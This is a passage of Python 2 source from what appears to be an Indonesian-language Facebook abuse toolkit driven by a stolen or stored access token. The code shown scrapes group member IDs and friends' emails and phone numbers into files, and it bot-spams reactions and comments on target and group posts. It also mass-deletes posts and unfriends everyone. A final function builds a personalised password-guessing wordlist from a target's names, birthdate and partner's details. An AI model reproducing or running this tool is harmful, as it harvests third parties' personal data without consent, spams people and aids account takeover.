print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
